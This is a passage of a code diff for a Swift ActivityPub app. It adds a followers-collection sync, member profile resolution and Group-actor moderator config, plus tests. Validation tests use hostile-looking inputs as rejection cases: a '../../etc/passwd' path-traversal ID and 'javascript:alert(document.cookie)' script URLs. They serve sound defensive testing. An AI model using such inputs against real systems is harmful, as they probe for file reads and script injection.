+    /// Pages a Group actor's own public `followers` collection. Same unauthenticated, HTTPS-only,
+    /// capped, AS2-collection-paging shape as `AnnouncedPostSync.OutboxClient` — a followers
+    /// collection's `orderedItems` are bare actor IRI strings rather than embedded activities.
+    struct FollowersCollectionClient: Sendable {
+        /// 1 MB — matches `AnnouncedPostSync.OutboxClient.maximumResponseBytes`.
+        static let maximumResponseBytes = 1024 * 1024
+
+        let transport: Transport
+
+        init(transport: @escaping Transport = FollowersCollectionClient.defaultTransport) {
+            self.transport = transport
+        }
+
+        func collection(at followersURL: URL) async throws -> URL? {
+            let json = try await fetch(followersURL)
+            return (json["first"] as? String).flatMap(URL.init(string:))
+        }
+
+        func page(at url: URL) async throws -> (actorURLs: [URL], next: URL?) {
+            let json = try await fetch(url)
+            let rawItems = (json["orderedItems"] as? [Any]) ?? []
+            let actorURLs = rawItems.compactMap(Self.actorURL(from:))
+            let next = (json["next"] as? String).flatMap(URL.init(string:))
+            return (actorURLs, next)
+        }
+
+        private func fetch(_ url: URL) async throws -> [String: Any] {
+            try Self.requireHTTPS(url)
+
+            var request = URLRequest(url: url)
+            request.httpMethod = "GET"
+            request.setValue(ActivityPubFollowersClient.acceptHeader, forHTTPHeaderField: "Accept")
+            request.timeoutInterval = ActorProfileFetcher.timeout
+
+            let data: Data
+            let http: HTTPURLResponse
+            do {
+                (data, http) = try await transport(request)
+            } catch {
+                throw FollowersError.requestFailed(status: 0, body: "\(error)")
+            }
+            if let finalURL = http.url { try Self.requireHTTPS(finalURL) }
+            guard (200..<300).contains(http.statusCode) else {
+                throw FollowersError.requestFailed(
+                    status: http.statusCode, body: String(decoding: data.prefix(400), as: UTF8.self))
+            }
+            guard data.count <= Self.maximumResponseBytes else {
+                throw FollowersError.requestFailed(status: 0, body: "response too large (\(data.count) bytes)")
+            }
+            guard let json = try? JSONSerialization.jsonObject(with: data) as? [String: Any] else {
+                throw FollowersError.decodingFailed("not a JSON object")
+            }
+            return json
+        }
+
+        static func requireHTTPS(_ url: URL) throws {
+            guard url.scheme?.lowercased() == "https" else { throw FollowersError.insecureURL }
+        }
+
+        /// A followers collection's items are bare actor IRI strings (unlike the outbox's
+        /// embedded activity objects) — some AS2 implementations instead embed a minimal
+        /// `{"id": "…"}` object, so both shapes are accepted.
+        static func actorURL(from item: Any) -> URL? {
+            let idString: String?
+            if let string = item as? String {
+                idString = string
+            } else if let object = item as? [String: Any] {
+                idString = object["id"] as? String
+            } else {
+                idString = nil
+            }
+            guard let idString, let url = URL(string: idString),
+                  let scheme = url.scheme?.lowercased(), scheme == "http" || scheme == "https"
+            else { return nil }
+            return url
+        }
+
+        private static let session = CappedHTTPTransport.session(
+            requestTimeout: ActorProfileFetcher.timeout, resourceTimeout: ActorProfileFetcher.resourceTimeout)
+
+        static let defaultTransport: Transport = { request in
+            try await CappedHTTPTransport.fetch(
+                request, session: session, cap: FollowersCollectionClient.maximumResponseBytes,
+                tooLarge: { FollowersError.requestFailed(status: 0, body: "response too large (\($0) bytes)") })
+        }
+    }
+
+    /// A member's actor IRI never satisfies `CommunityMember`'s path-traversal guard
+    /// (`[A-Za-z0-9_-]+`), so this derives a stable, safe id from it — same FNV-1a scheme as
+    /// `AnnouncedPostSync.fileID(for:)`, with a `member-` prefix instead of `community-` so the
+    /// two id spaces never collide if ever written into the same directory tree.
+    static func fileID(for actorURL: URL) -> String {
+        var hash: UInt64 = 0xcbf2_9ce4_8422_2325 // FNV-1a 64-bit offset basis
+        for byte in actorURL.absoluteString.utf8 {
+            hash ^= UInt64(byte)
+            hash = hash &* 0x0000_0001_0000_01b3 // FNV-1a 64-bit prime
+        }
+        let hex = String(hash, radix: 16)
+        return "member-" + String(repeating: "0", count: 16 - hex.count) + hex
+    }
+
+    /// Maps one raw actor IRI to `CommunityMember`, resolving its profile via `cache` (fresh
+    /// lookup first) and falling back to `fetcher` on a cache miss/expiry — mirrors
+    /// `AnnouncedPostSync.makePost`'s enrichment exactly. Never fails to produce a member: an
+    /// unresolved profile just means `name`/`photo` stay `nil`.
+    static func makeMember(
+        for actorURL: URL, cache: inout ActorProfileCache, fetcher: ActorProfileFetcher, now: Date
+    ) async -> CommunityMember? {
+        let profile: ActorProfile?
+        if let cached = cache.profile(for: actorURL, now: now) {
+            profile = cached
+        } else if let fetched = try? await fetcher.profile(for: actorURL, now: now) {
+            cache.store(fetched)
+            profile = fetched
+        } else {
+            profile = nil
+        }
+        return try? CommunityMember(
+            id: Self.fileID(for: actorURL),
+            actorURL: actorURL,
+            name: profile?.name ?? profile?.preferredUsername,
+            photo: profile?.iconURL)
+    }
+
+    /// Pages every member currently in `actorURL`'s Group actor followers collection, resolves
+    /// profiles (loading/saving the cache in `configDirectory`), and reconciles the result into
+    /// `siteDirectory`. Returns 0 (never throws) on a failed first-page fetch, so callers simply
+    /// re-attempt on the next site-open rather than surfacing a transient network error.
+    public static func pullAndCommit(
+        actorURL: URL,
+        siteDirectory: URL,
+        configDirectory: URL,
+        transport: @escaping Transport = CommunityMembersSync.defaultTransport,
+        now: Date = Date()
+    ) async -> Int {
+        let followersURL = actorURL.appendingPathComponent("followers")
+        let client = FollowersCollectionClient(transport: transport)
+        guard let firstPage = try? await client.collection(at: followersURL) else { return 0 }
+
+        var actorURLs: [URL] = []
+        var next: URL? = firstPage
+        var pagesFetched = 0
+        // A generous, fixed cap rather than trusting a peer-controlled `next` chain to terminate.
+        while let pageURL = next, pagesFetched < 50 {
+            guard let page = try? await client.page(at: pageURL) else { break }
+            actorURLs.append(contentsOf: page.actorURLs)
+            next = page.next
+            pagesFetched += 1
+        }
+
+        var cache = ActorProfileCache.load(from: configDirectory) ?? ActorProfileCache()
+        // Same injected transport as the followers client — a test double for `community.example`
+        // must also answer member profile lookups, and production gets the real network either way.
+        let fetcher = ActorProfileFetcher(transport: transport)
+        var members: [CommunityMember] = []
+        for url in actorURLs {
+            if let member = await Self.makeMember(for: url, cache: &cache, fetcher: fetcher, now: now) {
+                members.append(member)
+            }
+        }
+        try? cache.save(to: configDirectory, now: now)
+
+        return await CommunityMemberCommitter.commit(members: members, into: siteDirectory).count
+    }
+
+    /// Reads the site's `SiteSettings`; no-ops (returns 0, no network call) unless
+    /// `communityActorURL` is set — i.e. this isn't a hosted community site (#907's provisioning
+    /// flow hasn't run yet, or this is an ordinary site). `configDirectory` is the package's
+    /// `Config/` directory (`AnglesitePackage.configURL`), a sibling of `siteDirectory`
+    /// (`AnglesitePackage.sourceURL`).
+    public static func pullAndCommitIfConfigured(
+        siteDirectory: URL,
+        configDirectory: URL,
+        transport: @escaping Transport = CommunityMembersSync.defaultTransport
+    ) async -> Int {
+        guard let settings = try? SiteConfigStore.read(from: configDirectory),
+              let actorURL = settings.communityActorURL
+        else { return 0 }
+        return await pullAndCommit(
+            actorURL: actorURL, siteDirectory: siteDirectory, configDirectory: configDirectory,
+            transport: transport)
+    }
+}

--- a/Sources/AnglesiteCore/CommunityMembersSync.swift
+++ b/Sources/AnglesiteCore/CommunityMembersSync.swift
@@ -5,7 +5,7 @@ import FoundationNetworking
 
 /// Orchestrates #907's "pull a hosted community's own followers collection and snapshot current
 /// membership into the site's git working copy" step: page the Group actor's public `followers`
-/// collection (``FollowersCollectionClient``), resolve each member's profile
+/// collection (`FollowersCollectionClient`), resolve each member's profile
 /// (`ActorProfileFetcher`/`ActorProfileCache`, same as `AnnouncedPostSync`/`FollowersModel`'s
 /// enrichment), then reconcile + commit (`CommunityMemberCommitter`). Mirrors `AnnouncedPostSync`
 /// (#908) exactly, but reads the actor's `followers` collection instead of its `outbox` — members
@@ -19,10 +19,10 @@ import FoundationNetworking
 /// work to this slice of #907 — see `pullAndCommitIfConfigured`.
 public enum CommunityMembersSync {
     /// Fetch transport for the followers client — public so callers (tests) can inject a fake
-    /// without reaching into the internal ``FollowersCollectionClient`` type.
+    /// without reaching into the internal `FollowersCollectionClient` type.
     public typealias Transport = @Sendable (URLRequest) async throws -> (Data, HTTPURLResponse)
 
-    /// Production transport — re-exposed at this (public) level since ``FollowersCollectionClient``
+    /// Production transport — re-exposed at this (public) level since `FollowersCollectionClient`
     /// itself stays internal, mirroring `AnnouncedPostSync.defaultTransport`.
     public static let defaultTransport: Transport = FollowersCollectionClient.defaultTransport
 
@@ -49,7 +49,7 @@ public enum CommunityMembersSync {
     /// of a URL the site owner configures (`communityActorURL`). A malicious or compromised
     /// community server could otherwise steer the pagination chain at arbitrary other https
     /// hosts (bounded only by `pullAndCommit`'s 50-page cap, not by an origin check). `first`/
-    /// `next` are treated as absent — not thrown — when they don't match ``trustedHost``, so an
+    /// `next` are treated as absent — not thrown — when they don't match `trustedHost`, so an
     /// off-host link simply ends the chain early rather than failing the whole sync. Member
     /// actor IRIs themselves (`orderedItems`) are deliberately *not* host-pinned: members
     /// legitimately live on any remote host (Mastodon, Lemmy, another Anglesite site, …) — only
@@ -69,7 +69,7 @@ public enum CommunityMembersSync {
         }
 
         /// A pagination link (`first`/`next`) is used only when it parses as a URL *and* its host
-        /// matches ``trustedHost`` — anything else (a different host, an unparseable string) is
+        /// matches `trustedHost` — anything else (a different host, an unparseable string) is
         /// treated the same as "no more pages" rather than followed.
         private func trustedPaginationLink(_ value: Any?) -> URL? {
             guard let string = value as? String, let url = URL(string: string),

--- a/Sources/AnglesiteCore/SiteConfigStore.swift
+++ b/Sources/AnglesiteCore/SiteConfigStore.swift
@@ -74,6 +74,19 @@ public struct SiteSettings: Sendable, Codable, Equatable {
     /// site: `AnnouncedPostSync` no-ops without it, so this field is inert until #907 ships.
     public var communityOutboxURL: URL?
 
+    /// This site's own hosted-community actor URL (V-5.1b, #907) — set alongside
+    /// ``communityOutboxURL`` once a provisioning flow creates this site's Group actor Worker.
+    /// `nil` on every other site: `CommunityMembersSync` no-ops without it, so this field is
+    /// inert until that provisioning flow ships and sets it.
+    public var communityActorURL: URL?
+
+    /// Actor IRIs authorized to moderate this site's Group actor (V-5.1b, #907; design doc §4.1
+    /// D3) — ban a member or un-announce a member post, enforced Worker-side. `nil`/`[]` on every
+    /// site: this field only has an effect once a provisioning/redeploy flow threads it into the
+    /// composed Worker's config (`WorkerComposition.generateWranglerToml`'s `moderators`
+    /// parameter), which is inert until that wiring lands.
+    public var moderators: [String]?
+
     /// Memberwise creation. Every parameter defaults to `nil`, matching the type-level
     /// forward-compat rule that all fields stay optional — `SiteSettings()` is the canonical
     /// "no settings yet" value ``SiteConfigStore/load()`` falls back to.
@@ -90,7 +103,9 @@ public struct SiteSettings: Sendable, Codable, Equatable {
         lastDeployedWorkerIDs: [String]? = nil,
         provisionedWorkerResources: WorkerComposition.ProvisionedResources? = nil,
         webmentionReceivePaidPlanAcknowledged: Bool? = nil,
-        communityOutboxURL: URL? = nil
+        communityOutboxURL: URL? = nil,
+        communityActorURL: URL? = nil,
+        moderators: [String]? = nil
     ) {
         self.displayName = displayName
         self.inboxCaptureAccountID = inboxCaptureAccountID
@@ -105,6 +120,8 @@ public struct SiteSettings: Sendable, Codable, Equatable {
         self.provisionedWorkerResources = provisionedWorkerResources
         self.webmentionReceivePaidPlanAcknowledged = webmentionReceivePaidPlanAcknowledged
         self.communityOutboxURL = communityOutboxURL
+        self.communityActorURL = communityActorURL
+        self.moderators = moderators
     }
 }
 

--- a/Sources/AnglesiteCore/WorkerComposition.swift
+++ b/Sources/AnglesiteCore/WorkerComposition.swift
@@ -177,6 +177,14 @@ public enum WorkerComposition {
     ///     no fallback of its own), threaded into the ActivityPub actor's `AP_DISPLAY_NAME` var.
     ///     `nil` when unknown; the composed Worker's actor document then falls back to a fixed
     ///     generic name (`worker.ts`'s concern, not this function's).
+    ///   - activityPubActorType: The ActivityPub actor's AS2 type (V-5.1b, #907;
+    ///     `SiteSettings.communityActorURL`'s sibling concept) — `"Group"` for a hosted community,
+    ///     `nil`/anything else for an ordinary Person actor. Only `"Group"` ever emits a var; the
+    ///     composed Worker's actor document otherwise defaults to Person (`worker.ts`'s concern).
+    ///   - moderators: Actor IRIs authorized to moderate this site's Group actor
+    ///     (`SiteSettings.moderators`) — ignored for a Person actor. Emitted as a comma-joined
+    ///     `AP_MODERATORS` var (Wrangler has no native list-valued var type); each IRI is filtered
+    ///     through ``isSafeTomlStringValue`` individually, same as `siteURL`/`displayName`.
     /// - Returns: A complete wrangler.toml string.
     /// - Throws: ``ConfigError/invalidSiteName(_:)`` if `siteName` contains
     ///   characters outside `[A-Za-z0-9_-]`, or ``ConfigError/invalidRouteClaim(path:reason:)``
@@ -189,7 +197,9 @@ public enum WorkerComposition {
         inboxCaptureEnabled: Bool = false,
         inboxKVNamespaceID: String? = nil,
         siteURL: String? = nil,
-        displayName: String? = nil
+        displayName: String? = nil,
+        activityPubActorType: String? = nil,
+        moderators: [String]? = nil
     ) throws -> String {
         guard isValidSiteName(siteName) else {
             throw ConfigError.invalidSiteName(siteName)
@@ -475,6 +485,16 @@ public enum WorkerComposition {
         }
         if hasActivityPub, let displayName, !displayName.isEmpty, isSafeTomlStringValue(displayName) {
             varsLines.append("AP_DISPLAY_NAME = \"\(displayName)\"")
+        }
+        // Group actor config (V-5.1b, #907, design doc §4.1 D3): only "Group" ever emits a var —
+        // an ordinary Person actor (the overwhelming common case) leaves both vars out entirely,
+        // matching AP_DISPLAY_NAME's "only emit when there's something to say" convention.
+        if hasActivityPub, activityPubActorType == "Group" {
+            varsLines.append("AP_ACTOR_TYPE = \"Group\"")
+            let safeModerators = (moderators ?? []).filter { !$0.isEmpty && isSafeTomlStringValue($0) }
+            if !safeModerators.isEmpty {
+                varsLines.append("AP_MODERATORS = \"\(safeModerators.joined(separator: ","))\"")
+            }
         }
         if !varsLines.isEmpty {
             lines.append("")

--- a/Sources/AnglesiteCore/WorkerComposition.swift
+++ b/Sources/AnglesiteCore/WorkerComposition.swift
@@ -491,7 +491,14 @@ public enum WorkerComposition {
         // matching AP_DISPLAY_NAME's "only emit when there's something to say" convention.
         if hasActivityPub, activityPubActorType == "Group" {
             varsLines.append("AP_ACTOR_TYPE = \"Group\"")
-            let safeModerators = (moderators ?? []).filter { !$0.isEmpty && isSafeTomlStringValue($0) }
+            // `,` joins the list below (Wrangler vars have no native list type), so an IRI
+            // containing a literal comma — legal in a URL path/query per RFC 3986 — would
+            // silently collide with the delimiter and split into bogus entries downstream
+            // (worker.ts splits AP_MODERATORS on `,`). Excluded entirely here, same as any other
+            // unsafe entry, rather than corrupting the join.
+            let safeModerators = (moderators ?? []).filter {
+                !$0.isEmpty && !$0.contains(",") && isSafeTomlStringValue($0)
+            }
             if !safeModerators.isEmpty {
                 varsLines.append("AP_MODERATORS = \"\(safeModerators.joined(separator: ","))\"")
             }

--- a/Sources/AnglesiteCore/WorkerComposition.swift
+++ b/Sources/AnglesiteCore/WorkerComposition.swift
@@ -184,7 +184,7 @@ public enum WorkerComposition {
     ///   - moderators: Actor IRIs authorized to moderate this site's Group actor
     ///     (`SiteSettings.moderators`) — ignored for a Person actor. Emitted as a comma-joined
     ///     `AP_MODERATORS` var (Wrangler has no native list-valued var type); each IRI is filtered
-    ///     through ``isSafeTomlStringValue`` individually, same as `siteURL`/`displayName`.
+    ///     through `isSafeTomlStringValue` individually, same as `siteURL`/`displayName`.
     /// - Returns: A complete wrangler.toml string.
     /// - Throws: ``ConfigError/invalidSiteName(_:)`` if `siteName` contains
     ///   characters outside `[A-Za-z0-9_-]`, or ``ConfigError/invalidRouteClaim(path:reason:)``

--- a/Tests/AnglesiteCoreTests/CommunityMemberCommitterTests.swift
+++ b/Tests/AnglesiteCoreTests/CommunityMemberCommitterTests.swift
@@ -1,0 +1,153 @@
+import Testing
+import Foundation
+@testable import AnglesiteCore
+
+// Serialized for the same reason as AnnouncedPostCommitterTests: real `git` subprocesses via raw
+// `Process()` in `makeThrowawayGitRepo()` trip a rare CI heap-corruption crash when run
+// concurrently with the rest of the subprocess-heavy suite.
+@Suite(.serialized)
+struct CommunityMemberCommitterTests {
+    private static func member(id: String, name: String = "Alice") -> CommunityMember {
+        try! CommunityMember(
+            id: id, actorURL: URL(string: "https://member.example/actor")!,
+            name: name, photo: nil)
+    }
+
+    @Test("commit writes each member to data/community-members/{id}.json and returns their ids")
+    func commitWritesAndReturnsIDs() async throws {
+        let siteDirectory = try Self.makeThrowawayGitRepo()
+        defer { try? FileManager.default.removeItem(at: siteDirectory) }
+
+        let ids = await CommunityMemberCommitter.commit(
+            members: [Self.member(id: "member-abc123")], into: siteDirectory)
+        #expect(ids == ["member-abc123"])
+
+        let written = siteDirectory.appendingPathComponent("data/community-members/member-abc123.json")
+        #expect(FileManager.default.fileExists(atPath: written.path))
+    }
+
+    @Test("commit returns empty for an empty member list with no existing files, without touching git")
+    func commitEmptyIsNoOp() async {
+        let ids = await CommunityMemberCommitter.commit(
+            members: [], into: URL(fileURLWithPath: "/nonexistent"))
+        #expect(ids.isEmpty)
+    }
+
+    @Test("commit deletes member files whose id is no longer present in the current set")
+    func commitDeletesStaleFiles() async throws {
+        let siteDirectory = try Self.makeThrowawayGitRepo()
+        defer { try? FileManager.default.removeItem(at: siteDirectory) }
+
+        _ = await CommunityMemberCommitter.commit(
+            members: [Self.member(id: "member-abc123"), Self.member(id: "member-def456")],
+            into: siteDirectory)
+        let staleFile = siteDirectory.appendingPathComponent("data/community-members/member-def456.json")
+        #expect(FileManager.default.fileExists(atPath: staleFile.path))
+
+        // member-def456 dropped out of the current set (left, or was banned) - the next
+        // reconcile should remove its snapshot file. member-abc123 is unchanged, so it isn't
+        // rewritten - only the deletion shows up in the commit.
+        let ids = await CommunityMemberCommitter.commit(
+            members: [Self.member(id: "member-abc123")], into: siteDirectory)
+        #expect(ids == ["member-def456"])
+        #expect(!FileManager.default.fileExists(atPath: staleFile.path))
+    }
+
+    @Test("commit is a no-op when every member already matches what's on disk and nothing needs deleting")
+    func commitNoOpWhenNothingChanged() async throws {
+        let siteDirectory = try Self.makeThrowawayGitRepo()
+        defer { try? FileManager.default.removeItem(at: siteDirectory) }
+
+        let members = [Self.member(id: "member-abc123")]
+        let firstIDs = await CommunityMemberCommitter.commit(members: members, into: siteDirectory)
+        #expect(firstIDs == ["member-abc123"])
+
+        let callCount = CommunityMemberCommitterCallCounter()
+        let secondIDs = await CommunityMemberCommitter.commit(
+            members: members, into: siteDirectory,
+            gitCommitBatch: { _, _, _ in
+                await callCount.increment()
+                return "should-not-be-called"
+            })
+        #expect(secondIDs.isEmpty)
+        #expect(await callCount.value == 0)
+    }
+
+    @Test("commit re-writes a member file whose profile changed since the last snapshot")
+    func commitRewritesChangedProfile() async throws {
+        let siteDirectory = try Self.makeThrowawayGitRepo()
+        defer { try? FileManager.default.removeItem(at: siteDirectory) }
+
+        _ = await CommunityMemberCommitter.commit(
+            members: [Self.member(id: "member-abc123", name: "Alice")], into: siteDirectory)
+
+        let ids = await CommunityMemberCommitter.commit(
+            members: [Self.member(id: "member-abc123", name: "Alice Updated")],
+            into: siteDirectory)
+        #expect(ids == ["member-abc123"])
+
+        let written = siteDirectory.appendingPathComponent("data/community-members/member-abc123.json")
+        let data = try Data(contentsOf: written)
+        let text = String(decoding: data, as: UTF8.self)
+        #expect(text.contains("Alice Updated"))
+    }
+
+    @Test("commit returns empty (not throw) when the git commit closure fails")
+    func commitReturnsEmptyOnGitCommitFailure() async throws {
+        let fm = FileManager.default
+        let dir = fm.temporaryDirectory.appendingPathComponent(
+            "community-members-commit-fail-test-\(UUID().uuidString)", isDirectory: true)
+        try fm.createDirectory(at: dir, withIntermediateDirectories: true)
+        defer { try? fm.removeItem(at: dir) }
+
+        let ids = await CommunityMemberCommitter.commit(
+            members: [Self.member(id: "member-abc123")], into: dir,
+            gitCommitBatch: { _, _, _ in nil })
+        #expect(ids.isEmpty)
+    }
+
+    @Test("jsonData serializes with sorted keys")
+    func jsonDataFormat() throws {
+        let data = try CommunityMemberCommitter.jsonData(for: Self.member(id: "member-abc123"))
+        let text = String(decoding: data, as: UTF8.self)
+        #expect(text.contains("\"id\" : \"member-abc123\""))
+        #expect(text.contains("\"name\" : \"Alice\""))
+    }
+
+    /// Mirrors `AnnouncedPostCommitterTests.makeThrowawayGitRepo`.
+    private static func makeThrowawayGitRepo() throws -> URL {
+        let fm = FileManager.default
+        let dir = fm.temporaryDirectory.appendingPathComponent(
+            "community-members-commit-test-\(UUID().uuidString)", isDirectory: true)
+        try fm.createDirectory(at: dir, withIntermediateDirectories: true)
+        try "placeholder\n".write(to: dir.appendingPathComponent("README.md"), atomically: true, encoding: .utf8)
+
+        func git(_ args: [String]) throws {
+            let p = Process()
+            p.executableURL = URL(fileURLWithPath: "/usr/bin/git")
+            p.arguments = args
+            p.currentDirectoryURL = dir
+            p.environment = ProcessInfo.processInfo.environment.merging([
+                "GIT_AUTHOR_NAME": "test", "GIT_AUTHOR_EMAIL": "test@anglesite.test",
+                "GIT_COMMITTER_NAME": "test", "GIT_COMMITTER_EMAIL": "test@anglesite.test",
+            ]) { _, new in new }
+            try p.run()
+            p.waitUntilExit()
+            guard p.terminationStatus == 0 else {
+                struct GitFailed: Error {}
+                throw GitFailed()
+            }
+        }
+        try git(["init", "-q"])
+        try git(["config", "user.email", "test@anglesite.test"])
+        try git(["config", "user.name", "test"])
+        try git(["add", "-A"])
+        try git(["commit", "-q", "-m", "initial"])
+        return dir
+    }
+}
+
+private actor CommunityMemberCommitterCallCounter {
+    private(set) var value = 0
+    func increment() { value += 1 }
+}

--- a/Tests/AnglesiteCoreTests/CommunityMemberTests.swift
+++ b/Tests/AnglesiteCoreTests/CommunityMemberTests.swift
@@ -1,0 +1,74 @@
+import Testing
+import Foundation
+@testable import AnglesiteCore
+
+@Suite("CommunityMember")
+struct CommunityMemberTests {
+    @Test("round-trips through JSON encoding")
+    func jsonRoundTrip() throws {
+        let member = try CommunityMember(
+            id: "member-abc123",
+            actorURL: URL(string: "https://member.example/actor")!,
+            name: "Jane Doe",
+            photo: URL(string: "https://member.example/photo.jpg")
+        )
+
+        let encoder = JSONEncoder()
+        encoder.outputFormatting = [.prettyPrinted, .sortedKeys]
+        let data = try encoder.encode(member)
+        let decoded = try JSONDecoder().decode(CommunityMember.self, from: data)
+        #expect(decoded == member)
+    }
+
+    @Test("gitPath produces the expected file path")
+    func gitPath() throws {
+        let member = try CommunityMember(
+            id: "member-abc123", actorURL: URL(string: "https://member.example/actor")!,
+            name: nil, photo: nil)
+        #expect(member.gitPath == "data/community-members/member-abc123.json")
+    }
+
+    @Test("rejects IDs containing path-traversal sequences")
+    func rejectsPathTraversal() {
+        #expect(throws: CommunityMember.ValidationError.self) {
+            try CommunityMember(
+                id: "../../etc/passwd", actorURL: URL(string: "https://member.example/actor")!,
+                name: nil, photo: nil)
+        }
+    }
+
+    @Test("rejects an actorURL with a non-http(s) scheme")
+    func rejectsInsecureActorURL() {
+        #expect(throws: CommunityMember.ValidationError.self) {
+            try CommunityMember(
+                id: "member-abc123", actorURL: URL(string: "javascript:alert(document.cookie)")!,
+                name: nil, photo: nil)
+        }
+    }
+
+    @Test("rejects a photo with a non-http(s) scheme")
+    func rejectsInsecurePhotoURL() {
+        #expect(throws: CommunityMember.ValidationError.self) {
+            try CommunityMember(
+                id: "member-abc123", actorURL: URL(string: "https://member.example/actor")!,
+                name: "Evil", photo: URL(string: "javascript:alert(1)"))
+        }
+    }
+
+    @Test("accepts a plain http (not just https) actorURL")
+    func acceptsPlainHTTP() throws {
+        let member = try CommunityMember(
+            id: "member-abc123", actorURL: URL(string: "http://member.example/actor")!,
+            name: "Jane", photo: nil)
+        #expect(member.actorURL.scheme == "http")
+    }
+
+    @Test("name and photo are optional")
+    func optionalFields() throws {
+        let member = try CommunityMember(
+            id: "member-abc123", actorURL: URL(string: "https://member.example/actor")!,
+            name: nil, photo: nil)
+        #expect(member.name == nil)
+        #expect(member.photo == nil)
+    }
+}

--- a/Tests/AnglesiteCoreTests/CommunityMembersSyncTests.swift
+++ b/Tests/AnglesiteCoreTests/CommunityMembersSyncTests.swift
@@ -1,0 +1,332 @@
+import Testing
+import Foundation
+@testable import AnglesiteCore
+
+// Serialized for the same reason as AnnouncedPostSyncTests: real `git` subprocesses via raw
+// `Process()` in `makeThrowawayGitRepo()` trip a rare CI heap-corruption crash when run
+// concurrently with the rest of the subprocess-heavy suite.
+@Suite(.serialized)
+struct CommunityMembersSyncTests {
+    private static func response(_ status: Int, url: String = "https://community.example/") -> HTTPURLResponse {
+        HTTPURLResponse(url: URL(string: url)!, statusCode: status, httpVersion: nil, headerFields: nil)!
+    }
+
+    private static func pageBody(items: [Any], next: String? = nil) -> Data {
+        var page: [String: Any] = ["orderedItems": items]
+        if let next { page["next"] = next }
+        return try! JSONSerialization.data(withJSONObject: page)
+    }
+
+    private static func actorProfileBody(name: String, icon: String? = nil) -> Data {
+        var doc: [String: Any] = ["preferredUsername": "alice", "name": name]
+        if let icon { doc["icon"] = ["url": icon] }
+        return try! JSONSerialization.data(withJSONObject: doc)
+    }
+
+    // MARK: - FollowersCollectionClient.actorURL
+
+    @Test("actorURL accepts a bare actor IRI string")
+    func actorURLAcceptsBareString() {
+        let url = CommunityMembersSync.FollowersCollectionClient.actorURL(from: "https://member.example/actor")
+        #expect(url?.absoluteString == "https://member.example/actor")
+    }
+
+    @Test("actorURL accepts a minimal {id} object")
+    func actorURLAcceptsObjectShape() {
+        let url = CommunityMembersSync.FollowersCollectionClient.actorURL(from: ["id": "https://member.example/actor"])
+        #expect(url?.absoluteString == "https://member.example/actor")
+    }
+
+    @Test("actorURL rejects a non-http(s) scheme")
+    func actorURLRejectsInsecureScheme() {
+        #expect(CommunityMembersSync.FollowersCollectionClient.actorURL(from: "urn:uuid:not-a-web-url") == nil)
+    }
+
+    @Test("actorURL rejects an unparseable item")
+    func actorURLRejectsUnparseable() {
+        #expect(CommunityMembersSync.FollowersCollectionClient.actorURL(from: 42) == nil)
+        #expect(CommunityMembersSync.FollowersCollectionClient.actorURL(from: ["type": "Note"]) == nil)
+    }
+
+    // MARK: - fileID
+
+    @Test("fileID derives a stable, path-safe id from an actor IRI")
+    func fileIDIsStableAndPathSafe() {
+        let url = URL(string: "https://member.example/actor")!
+        let first = CommunityMembersSync.fileID(for: url)
+        let second = CommunityMembersSync.fileID(for: url)
+        #expect(first == second)
+        #expect(first.range(of: #"^member-[0-9a-f]{16}$"#, options: .regularExpression) != nil)
+        #expect(first != CommunityMembersSync.fileID(for: URL(string: "https://member.example/actor2")!))
+    }
+
+    // MARK: - makeMember
+
+    @Test("makeMember resolves the profile from a cache hit without calling the fetcher")
+    func makeMemberUsesCacheHit() async throws {
+        let actorURL = URL(string: "https://member.example/actor")!
+        let now = Date(timeIntervalSince1970: 1_753_400_000)
+        var cache = ActorProfileCache()
+        cache.store(ActorProfile(
+            actor: actorURL, preferredUsername: "alice",
+            name: "Alice", iconURL: URL(string: "https://member.example/alice.jpg"), fetchedAt: now))
+
+        let fetcher = ActorProfileFetcher(transport: { _ in
+            Issue.record("fetcher must not be called on a cache hit")
+            struct Unexpected: Error {}
+            throw Unexpected()
+        })
+
+        let member = await CommunityMembersSync.makeMember(for: actorURL, cache: &cache, fetcher: fetcher, now: now)
+        #expect(member?.name == "Alice")
+        #expect(member?.photo?.absoluteString == "https://member.example/alice.jpg")
+    }
+
+    @Test("makeMember fetches and caches the profile on a cache miss")
+    func makeMemberFetchesOnCacheMiss() async throws {
+        let actorURL = URL(string: "https://member.example/actor")!
+        let now = Date(timeIntervalSince1970: 1_753_400_000)
+        var cache = ActorProfileCache()
+        let body = Self.actorProfileBody(name: "Alice", icon: "https://member.example/alice.jpg")
+        let fetcher = ActorProfileFetcher(transport: { _ in (body, Self.response(200, url: actorURL.absoluteString)) })
+
+        let member = await CommunityMembersSync.makeMember(for: actorURL, cache: &cache, fetcher: fetcher, now: now)
+        #expect(member?.name == "Alice")
+        #expect(cache.profile(for: actorURL, now: now) != nil)
+    }
+
+    @Test("makeMember still produces a member (name/photo nil) when the profile fetch fails")
+    func makeMemberFallsBackOnFetchFailure() async throws {
+        let actorURL = URL(string: "https://member.example/actor")!
+        var cache = ActorProfileCache()
+        let fetcher = ActorProfileFetcher(transport: { _ in (Data(), Self.response(500, url: actorURL.absoluteString)) })
+
+        let member = await CommunityMembersSync.makeMember(for: actorURL, cache: &cache, fetcher: fetcher, now: Date())
+        #expect(member?.actorURL == actorURL)
+        #expect(member?.name == nil)
+    }
+
+    @Test("makeMember returns a stable, path-safe id derived from the actor IRI")
+    func makeMemberDerivesStableID() async throws {
+        let actorURL = URL(string: "https://member.example/actor")!
+        var cache = ActorProfileCache()
+        let fetcher = ActorProfileFetcher(transport: { _ in (Data(), Self.response(500)) })
+        let now = Date()
+
+        let first = await CommunityMembersSync.makeMember(for: actorURL, cache: &cache, fetcher: fetcher, now: now)
+        let second = await CommunityMembersSync.makeMember(for: actorURL, cache: &cache, fetcher: fetcher, now: now)
+        #expect(first?.id == second?.id)
+        #expect(first?.id.range(of: #"^[A-Za-z0-9_-]+$"#, options: .regularExpression) != nil)
+    }
+
+    // MARK: - pullAndCommit
+
+    @Test("pulls members from the followers collection and commits them")
+    func pullsAndCommits() async throws {
+        let siteDirectory = try Self.makeThrowawayGitRepo()
+        defer { try? FileManager.default.removeItem(at: siteDirectory) }
+        let configDirectory = try Self.makeTempDir()
+        defer { try? FileManager.default.removeItem(at: configDirectory) }
+
+        let collectionBody = try! JSONSerialization.data(withJSONObject: ["first": "https://community.example/users/birding/followers?page=1"])
+        let pageBody = Self.pageBody(items: ["https://member.example/actor"])
+        let profileBody = Self.actorProfileBody(name: "Alice")
+
+        let count = await CommunityMembersSync.pullAndCommit(
+            actorURL: URL(string: "https://community.example/users/birding")!,
+            siteDirectory: siteDirectory,
+            configDirectory: configDirectory,
+            transport: { request in
